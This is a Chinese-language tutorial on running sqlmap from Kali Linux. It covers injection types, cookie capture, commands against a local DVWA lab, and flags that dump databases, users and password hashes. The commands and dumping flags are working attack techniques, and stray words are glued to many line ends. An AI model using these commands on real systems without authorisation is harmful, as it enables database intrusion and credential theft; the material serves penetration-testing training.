kali之使用sqlmap进行sql注入

sqlmap简介

sqlmap支持五种不一样的注入模式:javascript

  • 一、基于布尔的盲注,便可以根据返回页面判断条件真假的注入。
  • 二、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增长)来判断。
  • 三、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
  • 四、联合查询注入,可使用union的状况下的注入。
  • 五、堆查询注入,能够同时执行多条语句的执行时的注入。

sqlmap支持的数据库有

MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDBjava

cookie注入

登陆网页后在浏览器url栏输入 javascript:document.cookie或者在console栏中输入document.cookie便可得到cookiemysql

sqlmap -u "http://可能注入的某个提交参数的url" --cookie="此次提交的cookie"sql

dvwa中测试

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=1129umpqj3j5siclohbkmik7nu" --level 3

--level 表明扫描等级,范围1~5。数值越大扫描越完整数据库

--batch --dbs 获取全部数据库浏览器

--current-db  当前使用的数据库cookie

--current-user  数据库使用帐户session

--users  全部用户dom

--passwords  数据库帐户与密码工具

-D dvwa --tables  查看指定数据库(例如:dvwa)的全部表

-D dvwa -T users --columns  查看指定数据库指定表的全部字段

执行完以后结果以下

显示结果被记录在/root/.sqlmap/output/127.0.0.1下面

log是注入的日志,target.txt是执行的sqlmap命令,session.sqlite能够用sqlitespy查看书库内容

从post数据包中注入

可使用burpsuite或者temperdata等工具来抓取post包

sqlmap -r “c:\tools\request.txt” -p “username” –dbms mysql    指定username参数

sqlmap详细命令

  • –is-dba 当前用户权限(是否为root权限)
  • –dbs 全部数据库
  • –current-db 网站当前数据库
  • –users 全部数据库用户
  • –current-user 当前数据库用户
  • –random-agent 构造随机user-agent
  • –passwords 数据库密码
  • –proxy http://local:8080 –threads 10 (能够自定义线程加速) 代理
  • –time-sec=TIMESEC DBMS响应的延迟时间(默认为5秒)

参考:http://www.vuln.cn/1992 

相关文章
相关标签/搜索